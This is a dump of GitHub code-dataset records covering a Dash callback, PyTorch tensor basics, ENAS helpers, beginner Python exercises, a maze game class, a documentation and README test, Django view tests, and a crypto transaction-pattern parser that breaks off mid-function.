app.run_server()\n","repo_name":"Pierian-Data/Plotly-Dashboards-with-Dash","sub_path":"2-08-MultipleInputs/callback3.py","file_name":"callback3.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":822,"dataset":"github-code","pt":"81"} +{"seq_id":"2928196386","text":"import torch\nimport torch.nn as nn\n\n\n\nprint(\"Using torch\", torch.__version__ )\n\n#set seed\ntorch.manual_seed(42)\n\n#check for GPU\ngpu_avail = torch.cuda.is_available()\nprint(\"Is the GPU available? 
%s\" % str(gpu_avail))\n\n# set device\ndevice = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\nprint(\"Device\", device)\n\n## create tensor\ntensor = torch.Tensor(2,3,4)\nprint(tensor)\n\none_array = torch.ones(2,3,4)\nprint(\"one array:\\n\",one_array)\n\nzeros_array = torch.zeros(2,3,4)\nprint(\"zeros array:\\n\",zeros_array)\n\nrand_array = torch.rand(2,3,4)\nprint(\"rand_array:\\n\",rand_array)\n\nrandn_array = torch.randn( 2,3,4)\nprint(\"randn:\\n\",randn_array)\n\narange_array = torch.arange(20, dtype=torch.int8, device='cpu')\nprint(\"arange: \\n\", arange_array)\n\n# tensor to numpy\npt_to_numpy = tensor.numpy()\nprint( \"tensor to numpy:\\n\", pt_to_numpy)\n\n# numpy to pytorch\nnumpy_to_pt = torch.from_numpy(pt_to_numpy)\nprint(\"numpy to tensor: \", numpy_to_pt)\n\n# reshape\nreshaped = arange_array.view(-1,5)\nprint(\"reshaped:\\n\", reshaped)\n\n# transpose\ntranspose = reshaped.permute(1,0)\nprint( \"transose:\\n\", transpose)\n\n\n# simple nn\nclass NN( nn.Module):\n def __init__(self, num_inputs, hidden_layer, num_outputs) -> None:\n super().__init__()\n self.l1 = nn.Linear( num_inputs, hidden_layer)\n self.actf = nn.ReLU()\n self.l2 = nn.Linear( num_inputs, hidden_layer)\n self.output = nn.Linear(num_outputs, hidden_layer)\n\n def forward(self, x):\n x = self.l1(x) \n x = self.actf(x)\n x = self.l2(x)\n x = self.actf()\n x = self.output(x)\n return x\n\nmodel = NN(2, 4, 1)\nprint(model)\n\nfor name, param in model.named_parameters():\n print(\"Parameter %s, shape %s\" % (name, str(param.shape)))\n\n","repo_name":"ds-praveenkumar/algorithm-from-scratch","sub_path":"deep-learning/neural_networks/pytorch.py","file_name":"pytorch.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25718575615","text":"import collections\nfrom collections import defaultdict\n\nimport numpy as np\nimport torch\n\nNode = collections.namedtuple('Node', ['id', 'name'])\n\n\nclass keydefaultdict(defaultdict):\n def __missing__(self, key):\n if self.default_factory is None:\n raise KeyError(key)\n else:\n ret = self[key] = self.default_factory(key)\n return ret\n\n\ndef get_variable(inputs, cuda=False, **kwargs):\n if type(inputs) in [list, np.ndarray]:\n inputs = torch.Tensor(inputs)\n if cuda:\n out = torch.Tensor(inputs.cuda(), **kwargs)\n else:\n out = torch.Tensor(inputs, **kwargs)\n return out\n","repo_name":"Sunshine-Ye/Beta-DARTS","sub_path":"optimizers/enas/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"81"} +{"seq_id":"72640172745","text":"minimum = 1\nmaximum = 100\nattempts = 0\n\nwhile attempts <3:\n number = int(input(\"input a number between 1 to 100: \"))\n if minimum <= number <= maximum:\n print(\"you enter a correct number\") \n break\n else:\n print(\"try again!\")\n \n attempts += 1\nif attempts == 3:\n print(\"None\")","repo_name":"rej23/python","sub_path":"getInt.py","file_name":"getInt.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37827834059","text":"\"\"\"\nAuthor SID: 500611960\nDate: 20/05/2020\nIT1110 Assessment Task - Acorn\n\"\"\"\n\nfrom game_parser import read_lines\nfrom grid import grid_to_string\nfrom player import Player\nfrom cells import *\nimport sys\n\n\n\nclass Game:\n \"\"\" Game class contains 
game function related booleans , \\\n creates a player and grid instance, keeps track of total moves\"\"\"\n def __init__(self, filename):\n self.exit = False\n self.filename = filename\n self.Player1 = Player()\n self.grid = read_lines(self.filename)\n self.success = False\n self.failure = False\n self.teleport = False\n self.total_moves = []\n self.total_moves_count = 0 \n self.oob = False\n self.incorrect_input = False\n self.e_count = 0\n\n\n def get_start_coordinate(self, grid, player):\n \"\"\" Searches parsed grid for the Start() instance coordinates, \\\n updates player.row and player.col\n \n Arguements:\n grid -- list of lists of cell Class instances\n player -- player Class instance\n\n Returns:\n Player coordinates -- list of 2 integers e.g. [1,3]\n \n \"\"\"\n starting_col = 0\n starting_row = 0\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n if \"Start\" in str(grid[i][j]):\n starting_col = i\n starting_row = j\n player.col = starting_col\n player.row = starting_row\n player_coordinates = [starting_col,starting_row]\n return player_coordinates\n\n\n\n\n def display_success_metrics(self, game):\n \"\"\" Displays total moves\\\n and victory message upon saving the Fire nation, exits game\n \n Arguement:\n Game() instance\n\n Prints:\n Success message with game statistics (moves and move count)\n \n Exits game\n\n \"\"\"\n print()\n print(\"You conquer the treacherous maze set up by the Fire Nation\\\n and reclaim the Honourable Furious Forest Throne, restoring your hometown\\\n back to its former glory of rainbow and sunshine! Peace reigns over the lands.\")\n print()\n if game.total_moves_count == 1:\n print(\"You made {} move.\".format(game.total_moves_count))\n else:\n print(\"You made {} moves.\".format(game.total_moves_count))\n if game.total_moves_count == 1:\n print(\"Your move: {}\".format(''.join(game.total_moves)))\n else:\n print(\"Your moves: {}\".format(', '.join(game.total_moves)))\n print()\n print(\"=====================\")\n print(\"====== YOU WIN! =====\")\n print(\"=====================\")\n sys.exit()\n\n\n\n def display_failure_metrics(self, game):\n \"\"\" Displays total moves and failure message\\\n upon losing to the Fire nation, exits game\n \n Arguement:\n Game() instance\n\n Prints:\n Failure message with game statistics (moves and move count)\n \n Exits game\n\n \"\"\"\n\n print(\"\\nYou step into the fires and watch your\\\n dreams disappear :(.\\n\\\n\\nThe Fire Nation triumphs! The Honourable Furious Forest is \\\nreduced to a pile of ash and is scattered to the winds by\\\n the next storm... 
You have been roasted.\")\n print()\n if game.total_moves_count <2:\n print(\"You made {} move.\".format(game.total_moves_count))\n else:\n print(\"You made {} moves.\".format(game.total_moves_count))\n if game.total_moves_count < 2:\n print(\"Your move: {}\".format(''.join(game.total_moves)))\n else:\n print(\"Your moves: {}\".format(', '.join(game.total_moves)))\n print()\n print(\"=====================\")\n print(\"===== GAME OVER =====\")\n print(\"=====================\")\n sys.exit()\n\n\n def check_cell_interaction(self, coordinates, move):\n \"\"\"Checks if a move can be performed by the player.\n Takes new coordinates from game_move and move string from user input\n Runs step() function on destination cell,\n which returns boolean as to whether move can be performed.\n and performs step function for water and fire cells\n if coordinates are a special cell (end, tele, water or fire), \n stores cells to be permenantly changed on the grid in Player1.\n \n Arguements:\n coordinates -- single list of two integers\n move -- string containing 'w' 'a' 's' 'd' 'e' 'q' / or invalid input \n \n Returns:\n boolean: True or False if player can move to new cell\n\n \"\"\"\n #check if new coordinates are valid\n self.coordinates = coordinates\n self.teleport = False\n row = coordinates[1] \n column = coordinates[0]\n is_valid_move = self.grid[column][row].step(self)\n\n #Check if a special cell is encountered - perform special function\n if \"End\" in str(self.grid[column][row]):\n self.success = True\n\n elif \"Water\" in str(self.grid[column][row]):\n self.Player1.change_coordinates.append([coordinates])\n self.Player1.grid_changes = True\n \n elif \"Fire\" in str(self.grid[column][row]) and self.Player1.num_water_buckets == 0:\n self.failure = True\n elif \"Fire\" in str(self.grid[column][row]) and self.Player1.num_water_buckets > 0:\n self.Player1.num_water_buckets -= 1\n self.Player1.change_coordinates.append([coordinates])\n self.Player1.grid_changes = True\n\n elif \"Teleport\" in str(self.grid[column][row]): \n for i in range(len(self.grid)):\n for j in range(len(self.grid[i])):\n if \"Teleport\" in str(self.grid[i][j]):\n if self.grid[i][j] != self.grid[column][row]:\n if self.grid[i][j].teleporter_number == self.grid[column][row].teleporter_number:\n self.Player1.col = i\n self.Player1.row = j\n self.teleport = True\n return is_valid_move\n\n return is_valid_move\n\n\n\n\n def game_move(self, move):\n \"\"\" Creates a new_coordinate based on player coordinates + user input, \n returns new coordinates and updates game boolean values \n if input invalid or results in player out of bounds (oob).\n These boolean values will be used in check_cell_interactions and reset each move\n \n Arguements: \n Move -- string containing 'w' 'a' 's' 'd' 'e' 'q' / or invalid input\n\n Returns:\n Single list of 2 integers [1,2]\n \"\"\"\n # current row and column set as new_coordinates to be adjusted according to input \n current_row = self.Player1.col\n current_column = self.Player1.row\n new_coordinates = [current_row,current_column]\n\n # game booleans oob (out of bounds) and incorrect_input are reset to False\n self.oob = False\n self.incorrect_input = False\n \n # if input is illegal - incorrect_input boolean is set to true\n if move != \"w\" and move != \"a\" and move != 's' and move != 'd' and move != 'e' and move != 'q':\n self.incorrect_input = True\n\n # update coordinate based on user input wasdeq\n elif move == 'w':\n if self.Player1.row != 0:\n self.oob=False\n new_coordinates[0] -= 1\n 
else:\n self.oob = True\n\n elif move == 'a':\n if self.Player1.row != 0:\n self.oob=False\n new_coordinates[1] -= 1\n else:\n self.oob = True\n\n elif move == 's':\n if self.Player1.col != self.Player1.grid_max_width:\n self.oob=False\n new_coordinates[0] += 1\n else:\n self.oob = True\n \n elif move == 'd':\n if self.Player1.row != self.Player1.grid_max_height:\n self.oob=False\n new_coordinates[1] += 1\n else:\n self.oob = True\n\n elif move == 'e':\n self.e_count +=1\n pass\n\n elif move == 'q':\n print()\n print(\"Bye!\")\n sys.exit()\n \n #initial check to ensure coordinates are positive\n if new_coordinates[0] < 0 or new_coordinates[1] < 0:\n self.oob = True\n\n return new_coordinates\n\n\n\n def get_cell_text(self, coordinates):\n \"\"\"Takes in new coordinates for player from game_move \n returns the associated message output from the cell associated with the new coordinates\n \n Arguement: \n coordinates -- list of 2 integers \n\n Returns: \n string: message from cell.message for game output\n \"\"\"\n self.coordinates = coordinates\n row = coordinates[0] \n column = coordinates[1]\n message = self.grid[row][column].message\n return message\n\n\n\n def check_new_coordinates_valid(self, new_coordinates, move):\n \"\"\" checks if the player movement is valid, \n if yes - update player coordinates, moves and move count. \n If not - pass. \n return cell message\n \n Arguements:\n new_coordinates: single list of 2 integers e.g. [1,2]\n move: string containing 'w' 'a' 's' 'd' 'e' 'q' / or invalid input\n\n Returns:\n message -- string variable containing message responding to cell interaction\n \n \"\"\"\n # Check for invalid input\n if self.incorrect_input == True:\n message = 'Please enter a valid move (w, a, s, d, e, q).' + '\\n'\n self.incorrect_input = False\n return message\n\n # Check player not out of bounds\n if self.oob == False:\n\n # Check if move valid and perform step function, \n # Update player coordinates and game moves list\n # return cell message\n if self.check_cell_interaction(new_coordinates, move) == True:\n self.Player1.col = new_coordinates[0]\n self.Player1.row = new_coordinates[1]\n self.total_moves.append(move)\n self.total_moves_count +=1\n message = self.get_cell_text(new_coordinates)\n return message\n\n #If move invalid, check if teleporter, if not, its a wall, return msg\n elif self.check_cell_interaction(new_coordinates, move) == False:\n if self.teleport == True:\n self.total_moves.append(move)\n self.total_moves_count +=1 \n message = self.get_cell_text(new_coordinates)\n return message\n\n # conditionals for if the cell move is invalid / self.oob = out of bounds\n # will create and return a message variable dependent on the specific cell\n else:\n if self.oob == True:\n message = ('You walked into a wall. Oof!' 
+ \"\\n\" )\n self.oob = False\n return message\n\n\n\n\n #SOLVER USE ONLY FUNCTIONS BELOW\n\n\n def check_cell_interaction_solver(self, coordinates, move):\n \"\"\"Checks if a move can be performed by the player.\n Takes new coordinates from game_move and move string from user input\n Runs step_solver_bool() function on destination cell,\n which returns boolean as to whether move can be performed.\n *** Does not perform special cell functions ***\n *** Only used by solver ***\n \n Arguements:\n coordinates -- single list of two integers\n move -- string containing 'w' 'a' 's' 'd' 'e' 'q' / or invalid input \n \n Returns:\n boolean: True or False if player can move to new cell\n\n \"\"\"\n\n self.teleport = False\n row = coordinates[1] \n column = coordinates[0]\n is_valid_move = self.grid[column][row].step_solver_bool(self)\n return is_valid_move\n\n \n \n def solver_check_new_coordinates_valid_and_move(self, new_coordinates, move):\n \"\"\" checks if the player movement is valid, \n If yes - update player coordinates, moves and move count.\n If not - pass. return cell message\n \n Arguements:\n new_coordinates: single list of 2 integers e.g. [1,2]\n move: string containing 'w' 'a' 's' 'd' 'e' 'q' / or invalid input\n\n Returns:\n boolean -- was move successful? T/F\n \n \"\"\"\n #e_count used to optimize solver - limited to 1 use per map\n if move == 'e':\n self.e_count += 1\n if self.e_count > 1:\n return False\n\n #check for incorrect input\n if self.incorrect_input == True:\n message = 'Please enter a valid move (w, a, s, d, e, q).' + '\\n'\n self.incorrect_input = False\n return False\n\n #check for oob\n if self.oob == False:\n\n #update player position, move count and moves list\n if self.check_cell_interaction(new_coordinates, move) == True:\n self.Player1.col = new_coordinates[0]\n self.Player1.row = new_coordinates[1]\n self.total_moves.append(move)\n self.total_moves_count +=1\n message = self.get_cell_text(new_coordinates)\n return True\n\n #If move invalid, check if teleporter, if not, its a wall, return msg\n elif self.check_cell_interaction(new_coordinates, move) == False:\n if self.teleport == True:\n self.total_moves.append(move)\n self.total_moves_count +=1 \n message = self.get_cell_text(new_coordinates)\n return False\n\n # conditionals for if the cell move is invalid / self.oob = out of bounds\n # will create and return a message variable dependent on the specific cell\n else:\n if self.oob == True:\n message = ('You walked into a wall. Oof!' + \"\\n\" )\n self.oob = False\n return False\n\n\n\n def solver_check_new_coordinates_valid(self, new_coordinates, move):\n \"\"\" checks if the player movement is valid, if yes - returns true. If not - pass.\n \n Arguements:\n new_coordinates: single list of 2 integers e.g. [1,2]\n move: string containing 'w' 'a' 's' 'd' 'e' 'q' / or invalid input\n\n Returns:\n boolean - is move possible? T/F\n \n \"\"\"\n # E_count - used for solver optimization\n if move == 'e':\n self.e_count += 1\n if self.e_count > 1:\n return False\n\n # Invalid input returns false\n if self.incorrect_input == True:\n message = 'Please enter a valid move (w, a, s, d, e, q).' 
+ '\\n'\n self.incorrect_input = False\n return False\n\n if self.oob == False:\n # Checks if move valid\n if self.check_cell_interaction_solver(new_coordinates, move) == True:\n return True\n\n # Checks if move valid\n if self.check_cell_interaction_solver(new_coordinates, move) == False:\n return False\n\n # Return false if OOB\n else:\n if self.oob == True:\n self.oob = False\n return False \n\n \n def solver_move_and_validate(self, move):\n \"\"\" Solver function to move player \n \n Arguements: move - 'w' 'a' 's' 'd' 'e' 'q'\n \n Returns boolean T/F whether move successful\n \n \"\"\"\n # get new coordinates from game_move\n next_move = self.game_move(move)\n # check if new coordinates are valid and perform move\n return self.solver_check_new_coordinates_valid_and_move(next_move, move)\n\n\n def solver_move_check(self, move):\n \"\"\" Solver function to check if player move legal \n \n Arguements: move - 'w' 'a' 's' 'd' 'e' 'q'\n \n Returns boolean T/F whether move possible\n \n \"\"\"\n\n # get new coordinates from game_move\n next_move = self.game_move(move)\n # check if new coordinates are valid\n return self.solver_check_new_coordinates_valid(next_move, move)\n\n\n def check_cell_teleporter(self, grid1, column, row):\n \"\"\"Checks if cell if a teleporter \n - used for solver optimization of 'wait'\n\n Arguements:\n grid -- list of list of cell instances\n column -- players current column \n \n Returns:\n boolean: True or False if cell is a teleporter\n\n \"\"\"\n if \"Teleport\" in str(grid1[column][row]):\n #update player coordinates to new teleporter\n return True\n\n","repo_name":"JamieMickaill/AcornMazeSolver","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":17000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23950922815","text":"# -*- coding: utf-8 -*-\nimport shlex\nimport subprocess\nfrom os.path import abspath, dirname, join\n\nSKIP_EXAMPLES = [\"Example 4\"]\n\n\ndef test_build_documentation():\n docroot = join(dirname(dirname(abspath(__file__))), \"docs\")\n cmd = shlex.split(\"sphinx-build -aE . 
_build\")\n proc = subprocess.Popen(\n cmd, cwd=docroot, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n status = proc.wait()\n assert status == 0\n issues = []\n for output in proc.communicate():\n for line in str(output).split(\"\\\\n\"):\n line = line.lower().strip()\n if \"warning\" in line or \"error\" in line or \"traceback\" in line:\n issues.append(line)\n for line in issues:\n print(line)\n assert not issues\n\n\ndef test_readme_examples(plex):\n failed = 0\n examples = _fetch_examples()\n assert len(examples), \"No examples found in README\"\n for title, example in examples:\n if _check_run_example(title):\n try:\n print(f\"\\n{title}\\n{'-' * len(title)}\")\n exec(\"\\n\".join(example))\n except Exception as err:\n failed += 1\n print(f\"Error running test: {title}\\nError: {err}\")\n assert not failed, f\"{failed} examples raised an exception.\"\n\n\ndef _fetch_examples():\n parsing = False\n examples = []\n filepath = join(dirname(dirname(abspath(__file__))), \"README.rst\")\n with open(filepath, \"r\") as handle:\n for line in handle.read().split(\"\\n\"):\n line = line[4:]\n if line.startswith(\"# Example \"):\n parsing = True\n title = line.lstrip(\"# \")\n examples.append([title, []])\n elif parsing and line == \"\":\n parsing = False\n elif parsing:\n examples[-1][1].append(line)\n return examples\n\n\ndef _check_run_example(title):\n for skip_example in SKIP_EXAMPLES:\n if skip_example in title:\n return False\n return True\n","repo_name":"pkkid/python-plexapi","sub_path":"tests/test_misc.py","file_name":"test_misc.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":1028,"dataset":"github-code","pt":"81"} +{"seq_id":"16153957990","text":"# Faça um programa que leia três números e mostre qual é o maior e qual é o menor.\na = int(input('Digite um número inteiro:'))\nb = int(input('Digite um outro inteiro diferente:'))\nc = int(input('Digite só mais um número inteiro:'))\nif a > b and a > c:\n maior = a\nif b > c and b > a:\n maior = b\nif c > a and c > a:\n maior = c\nif a < b and a < c:\n menor = a\nif b < c and b < a:\n menor = b\nif c < a and c < b:\n menor = c\nif a < b and a > c:\n medio = a\nif b < c and b > a:\n medio = b\nif c < a and c > b:\n medio = c\nprint('A ordem crescente dos valores é: {}, {} e {}.'.format(menor, medio, maior))\n\n","repo_name":"sauliiin/Python-from-Padawan-to-Jedi","sub_path":"033.py","file_name":"033.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"29710269303","text":"\nfrom django.urls import reverse\nfrom django.core import mail\nfrom items.models import Item, FavoriteProduct\nfrom django.urls import reverse\n\n\ndef test_main_page(client, faker, product_factory):\n response = client.get(reverse('about'))\n assert response.status_code == 200\n \n\n data = {\n 'email': faker.email(),\n 'text': faker.sentence()\n }\n response = client.post(reverse('about'), data=data, follow=True)\n assert response.status_code == 200\n assert any(i[0] == reverse('about') for i in response.redirect_chain)\n assert data['email'] in mail.outbox[0].body\n assert data['text'] in mail.outbox[0].body\n\n\n\ndef test_products_list(login_user, product_factory, faker):\n client, user = login_user\n response = client.get(reverse('main'))\n assert response.status_code == 200\n assert not response.context['object_list']\n\n product = product_factory()\n response = client.get(reverse('main'))\n assert 
response.status_code == 200\n assert len(response.context['object_list']) == 3\n\n response = client.get(reverse('product_detail', args=(faker.uuid4(),)))\n assert response.status_code == 404\n\n response = client.get(reverse('product_detail', args=(str(product.id),)))\n assert response.status_code == 200\n\n\ndef test_add_and_delete_favorites(client, faker, product_factory):\n \n url = reverse('favorites')\n \n data = {\n 'product_uuid': faker.uuid4()\n }\n\n\n response = client.post(reverse('add_or_remove_favorite'), data=data, follow=True)\n assert response.status_code == 200\n assert product_factory in response.context_data['favorites'].items.iterator()\n ","repo_name":"maksimm56m67/Hillel-django-shop","sub_path":"items/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6285633807","text":"import random \n\ndef guess(x):\n random_number = random.randint(1, x)\n guess = 0\n while guess != random_number:\n guess = int(input(f\"1 ile {x} arasında bir tamsayı tahmin ediniz: \"))\n if guess < random_number:\n print(\"Üzgünüm, Tuttuğunuz sayı çok küçük. Tekrar deneyiniz: \")\n elif guess > random_number:\n print(\"Üzgünüm, Tuttuğunuz sayı çok büyük. Tekrar deneyiniz: \")\n\n print(f\"Tebrikler. Doğru tahmin ettiniz, sayımız {random_number}\")\n\nguess(10)","repo_name":"Kadir-Akipek/Python_Projects","sub_path":"Bilgisayarın tuttuğu sayıyı tahmin etme oyunu.py","file_name":"Bilgisayarın tuttuğu sayıyı tahmin etme oyunu.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"27397869988","text":"import json\r\nfrom builtins import list\r\nfrom datetime import datetime\r\nimport bisect\r\nimport copy\r\nimport numpy as np\r\nimport os\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nimport MarketStateManager\r\nimport TransactionBasics\r\nimport random\r\n\r\n\r\nPeakFeatureCount = TransactionBasics.PeakFeatureCount\r\npercent = 0.01\r\nIsOneFileOnly = False\r\n\r\n\r\nclass SuddenChangeHandler:\r\n WeirdCount = 0\r\n NormalCount = 0\r\n riseTotalPower = []\r\n fallTotalPower = []\r\n def __init__(self, jsonIn, transactionParam,marketState):\r\n self.marketState = marketState\r\n self.jumpTimeInSeconds = 0\r\n self.reportTimeInSeconds = 0\r\n self.reportPrice = 0.0\r\n self.jumpPrice = 0.0\r\n self.transactions = []\r\n self.maxMinList = []\r\n self.riseList = []\r\n self.timeList = []\r\n self.currencyName = \"\"\r\n self.isRise = False\r\n self.downUpList = []\r\n self.transactionParam = transactionParam\r\n\r\n self.patternList = []\r\n self.mustBuyList = []\r\n self.badPatternList = []\r\n\r\n self.mustSellList = []\r\n self.keepList = []\r\n self.addedCount = 0\r\n\r\n self.jumpState = []\r\n self.__Parse(jsonIn)\r\n\r\n\r\n self.lowestTransaction = TransactionBasics.TransactionCountPerSecBase\r\n self.acceptedTransLimit = TransactionBasics.TransactionLimitPerSecBase\r\n self.dataList = []\r\n tempTransaction = json.loads(jsonIn[\"transactions\"])\r\n if len(tempTransaction) == 0:\r\n return\r\n lastTimeInSeconds = int(tempTransaction[-1][\"T\"]) // 1000\r\n if self.reportTimeInSeconds - lastTimeInSeconds > 1500:\r\n self.jumpTimeInSeconds -= 3600\r\n self.reportTimeInSeconds -= 3600\r\n\r\n self.minIndex = 0\r\n self.maxIndex = 0\r\n self.maxPrice = 0\r\n self.minPrice = 1000\r\n for index in range(len(tempTransaction)):\r\n transaction = 
tempTransaction[index]\r\n curTimeInSeconds = int(transaction[\"T\"]) // 1000\r\n curPrice = float(transaction[\"p\"])\r\n if curTimeInSeconds < self.jumpTimeInSeconds - 10 or curTimeInSeconds > self.reportTimeInSeconds+10:\r\n continue\r\n if curPrice <= self.minPrice:\r\n self.minPrice = curPrice\r\n self.minIndex = index\r\n self.minTime = curTimeInSeconds\r\n if curPrice >= self.maxPrice:\r\n self.maxPrice = curPrice\r\n self.maxIndex = index\r\n self.maxTime = curTimeInSeconds\r\n\r\n if self.isRise:\r\n self.peakIndex = self.minIndex\r\n else:\r\n self.peakIndex = self.maxIndex\r\n\r\n self.peakTime = int(tempTransaction[self.peakIndex][\"T\"])//1000\r\n self.peakVal = float(tempTransaction[self.peakIndex][\"p\"])\r\n\r\n self.__DivideDataInSeconds(tempTransaction, self.transactionParam.msec, self.dataList, 0, len(tempTransaction)) #populates the dataList with TransactionData\r\n self.__AppendToPatternList(tempTransaction) # deletes dataList and populates mustBuyList, patternList badPatternList\r\n\r\n\r\n def GetFeatures(self):\r\n #return self.downUpList\r\n return TransactionBasics.GetMaxMinList( self.maxMinList )\r\n #return []\r\n #self.timeList[-PeakFeatureCount:] + self.riseList[-PeakFeatureCount:]\r\n #return self.maxMinList + self.timeList[-SuddenChangeHandler.PeakFeatureCount:] + self.riseList[-SuddenChangeHandler.PeakFeatureCount:]\r\n\r\n def __Parse(self, jsonIn):\r\n epoch = datetime.utcfromtimestamp(0)\r\n\r\n self.isRise = bool(jsonIn[\"isRise\"])\r\n self.jumpPrice = float(jsonIn[\"jumpPrice\"])\r\n self.reportPrice = float(jsonIn[\"reportPrice\"])\r\n datetime_object = datetime.strptime(jsonIn[\"reportTime\"].split(\".\")[0], '%Y-%b-%d %H:%M:%S')\r\n self.reportTimeInSeconds = (datetime_object - epoch).total_seconds()\r\n self.riseList = jsonIn[\"riseList\"]\r\n self.timeList = jsonIn[\"timeList\"]\r\n\r\n for i in range(len(self.riseList) - 1 ):\r\n if self.riseList[i]*self.riseList[i+1] > 0.0:\r\n self.riseList.pop(i)\r\n self.timeList.pop(i)\r\n #TransactionBasics.RiseListSanitizer(self.riseList, self.timeList)\r\n\r\n\r\n self.maxMinList = jsonIn[\"maxMin\"]\r\n datetime_object = datetime.strptime(jsonIn[\"time\"].split(\".\")[0], '%Y-%b-%d %H:%M:%S')\r\n self.jumpTimeInSeconds = (datetime_object - epoch).total_seconds()\r\n self.downUpList = jsonIn[\"downUps\"]\r\n self.currencyName = jsonIn[\"name\"]\r\n\r\n def __DivideDataInSeconds(self, jsonIn, msecs, datalist, startIndex, endIndex ):\r\n transactionData = TransactionBasics.TransactionData()\r\n lastEndTime = 0\r\n stopMiliSecs = int(jsonIn[endIndex-1][\"T\"])+1000\r\n for x in range(startIndex,endIndex):\r\n curElement = jsonIn[x]\r\n curMiliSecs = int(curElement[\"T\"])\r\n if x == startIndex:\r\n lastEndTime = curMiliSecs//msecs*msecs + msecs\r\n transactionData.SetTime(curMiliSecs // msecs)\r\n\r\n if curMiliSecs > lastEndTime:\r\n copyData = copy.deepcopy(transactionData)\r\n datalist.append(copyData)\r\n transactionData.Reset()\r\n transactionData.AddData(curElement)\r\n\r\n while True:\r\n if curMiliSecs > (lastEndTime + msecs) and lastEndTime < stopMiliSecs:\r\n emptyData = TransactionBasics.TransactionData()\r\n emptyData.SetTime(lastEndTime // msecs)\r\n emptyData.SetIndex(x)\r\n emptyData.lastPrice = copyData.lastPrice\r\n lastEndTime += msecs\r\n if startIndex == 0:\r\n datalist.append(emptyData)\r\n else:\r\n transactionData.SetTime(curMiliSecs // msecs)\r\n transactionData.SetIndex(x)\r\n lastEndTime += msecs\r\n break\r\n else:\r\n transactionData.AddData(curElement)\r\n 
transactionData.SetIndex(x)\r\n copyData = copy.deepcopy(transactionData)\r\n datalist.append(copyData)\r\n\r\n def __AppendToPatternList(self, jsonIn):\r\n lenArray = len(self.dataList)\r\n if lenArray == 0:\r\n return\r\n # print(lenArray, self.dataList)\r\n maxTradeVal = 0\r\n for x in range(lenArray):\r\n curTimeInSeconds = self.dataList[x].timeInSecs\r\n if curTimeInSeconds > self.reportTimeInSeconds+10:\r\n continue\r\n lastTotalTradePower = self.dataList[x].totalBuy + self.dataList[x].totalSell\r\n if lastTotalTradePower > maxTradeVal :\r\n maxTradeVal = lastTotalTradePower\r\n self.__AppendToPatternListImpl(self.transactionParam.gramCount, x, lenArray, jsonIn)\r\n if len(self.patternList) == 0:\r\n self.dataList.reverse()\r\n\r\n if len(self.patternList) > TransactionBasics.MaximumSampleSizeFromGoodPattern:\r\n sorted(self.patternList, key=lambda l: l.totalBuy)\r\n self.patternList = self.patternList[-TransactionBasics.MaximumSampleSizeFromGoodPattern:]\r\n\r\n if len(self.badPatternList) > TransactionBasics.MaximumSampleSizeFromPattern:\r\n self.badPatternList = random.sample(self.badPatternList, TransactionBasics.MaximumSampleSizeFromPattern)\r\n\r\n if self.isRise:\r\n SuddenChangeHandler.riseTotalPower.append(maxTradeVal)\r\n else:\r\n SuddenChangeHandler.fallTotalPower.append(maxTradeVal)\r\n\r\n del self.dataList\r\n\r\n def __AppendToPatternListImpl(self, ngramCount, curIndex, lenArray, jsonIn):\r\n totalCount = TransactionBasics.GetTotalPatternCount(ngramCount)\r\n startBin = curIndex + 1 - totalCount\r\n endBin = curIndex + 1\r\n if startBin < 0 or curIndex > lenArray:\r\n return\r\n\r\n curPattern = self.dataList[curIndex]\r\n lastTotalCount = curPattern.transactionBuyCount\r\n # if lastTotalCount < self.lowestTransaction:\r\n # return\r\n\r\n if curPattern.totalBuy < 0.1:\r\n return\r\n\r\n # if self.dataList[curIndex].totalSell > 0.5:\r\n # return\r\n #\r\n #if self.isRise:\r\n # print(\"Analyzing rise\")\r\n pattern = TransactionBasics.TransactionPattern()\r\n copyList = copy.deepcopy(self.dataList[startBin:endBin])\r\n dataRange = TransactionBasics.ReduceToNGrams(copyList, ngramCount)\r\n #\r\n #if dataRange[0].totalTransactionCount < 0.1:\r\n # return\r\n # #\r\n\r\n if dataRange[0].transactionBuyCount < 0.09 or dataRange[0].transactionBuyCount > 1.2:\r\n return\r\n\r\n if dataRange[0].totalBuy < 0.0005 or dataRange[0].totalBuy > 0.012:\r\n return\r\n\r\n if dataRange[0].totalSell < 0.0002 or dataRange[0].totalSell > 0.008:\r\n return\r\n\r\n if dataRange[1].transactionBuyCount < 0.16 or dataRange[1].transactionBuyCount > 2.05:\r\n return\r\n\r\n if dataRange[1].totalBuy < 0.0012 or dataRange[1].totalBuy > 0.023:\r\n return\r\n\r\n if dataRange[1].totalSell < 0.00035 or dataRange[1].totalSell > 0.015:\r\n return\r\n\r\n if dataRange[2].transactionBuyCount < 0.45 or dataRange[2].transactionBuyCount > 3.02:\r\n return\r\n\r\n if dataRange[2].totalBuy < 0.003 or dataRange[2].totalBuy > 0.023:\r\n return\r\n\r\n if dataRange[2].totalSell < 0.00013 or dataRange[2].totalSell > 0.017:\r\n return\r\n\r\n\r\n # #\r\n # if dataRange[1].totalBuy < 0.0016:\r\n # return\r\n #\r\n # if dataRange[1].totalSell > 